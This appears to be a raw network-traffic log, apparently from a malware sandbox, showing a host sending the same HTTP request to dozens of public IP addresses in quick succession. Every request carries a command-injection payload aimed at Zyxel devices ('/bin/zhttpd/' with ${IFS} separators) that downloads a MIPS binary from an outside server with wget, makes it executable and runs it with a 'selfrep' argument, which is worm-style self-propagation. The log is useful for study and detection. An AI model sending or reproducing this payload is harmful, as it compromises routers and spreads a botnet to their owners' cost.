                                                Jan 12, 2024 18:24:45.090604067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6868192.168.2.1337540200.250.13.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.090651989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6869192.168.2.1342454182.204.195.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.090702057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6870192.168.2.135318461.57.226.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.090750933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6871192.168.2.134044677.60.225.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.090826988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6872192.168.2.1335772173.217.61.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.090872049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6873192.168.2.1337290103.211.223.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.090939045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6874192.168.2.1356536170.47.31.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.090996027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6875192.168.2.136038696.68.186.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.091056108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6876192.168.2.1353168174.199.174.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.091109991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6877192.168.2.135019879.68.232.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.091170073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6878192.168.2.133832240.45.245.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.096441031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6879192.168.2.135332045.58.227.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.096518993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6880192.168.2.1333838211.115.61.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.096570969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6881192.168.2.1335832175.99.215.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.096635103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6882192.168.2.1353486218.180.117.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.096692085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6883192.168.2.134648271.148.90.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.096740007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6884192.168.2.1345472143.5.205.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.104285002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6885192.168.2.1342346208.106.107.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.104330063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6886192.168.2.135564478.43.159.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.104352951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6887192.168.2.13537049.166.85.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.104403019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6888192.168.2.135748870.233.28.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.104433060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6889192.168.2.1334708132.180.39.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.104492903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6890192.168.2.1336438176.254.98.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.104527950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6891192.168.2.1357068146.161.6.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.104573965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6892192.168.2.134846463.90.141.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.104609966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6893192.168.2.1351000116.26.190.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.104635954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6894192.168.2.1344346113.102.198.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.104691982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6895192.168.2.1355594207.200.222.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.104748964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6896192.168.2.1359594114.139.161.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.104787111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6897192.168.2.1354146176.94.92.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.104829073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6898192.168.2.135814840.128.88.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.104871988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6899192.168.2.1347842220.80.90.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.104907990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6900192.168.2.1352628216.177.153.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.104947090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6901192.168.2.1340852131.191.203.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.104970932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6902192.168.2.1341220211.215.94.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105032921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6903192.168.2.133819499.50.85.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105065107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6904192.168.2.1344770193.233.87.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105104923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6905192.168.2.1336716163.39.175.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105161905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6906192.168.2.1350334100.230.27.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105178118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6907192.168.2.134096220.52.51.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105226994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6908192.168.2.133719251.27.121.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105259895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6909192.168.2.135099258.26.81.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105292082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6910192.168.2.1335822217.167.96.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105339050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6911192.168.2.1334902159.28.218.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105360031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6912192.168.2.1359380118.157.57.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105411053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6913192.168.2.1336706142.68.116.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105451107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6914192.168.2.1349622195.18.142.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105479002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6915192.168.2.135494687.3.153.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105539083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6916192.168.2.1358442208.255.177.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105572939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6917192.168.2.1343482141.75.43.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105627060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6918192.168.2.1353752130.190.128.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105667114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6919192.168.2.135176819.201.7.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105715036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6920192.168.2.134127278.111.207.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105743885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6921192.168.2.1347314126.49.56.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105787039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6922192.168.2.1356092183.133.96.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105829954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6923192.168.2.1346508156.202.133.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105875969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6924192.168.2.135897899.118.148.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105902910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6925192.168.2.1333586208.179.123.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105952024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6926192.168.2.134442436.154.51.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.105973959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6927192.168.2.1356240109.124.224.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106007099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6928192.168.2.1354864200.242.1.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106062889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6929192.168.2.1357746164.63.137.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106106997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6930192.168.2.1345864200.234.229.34443
                                                TimestampBytes transferredDirectionData
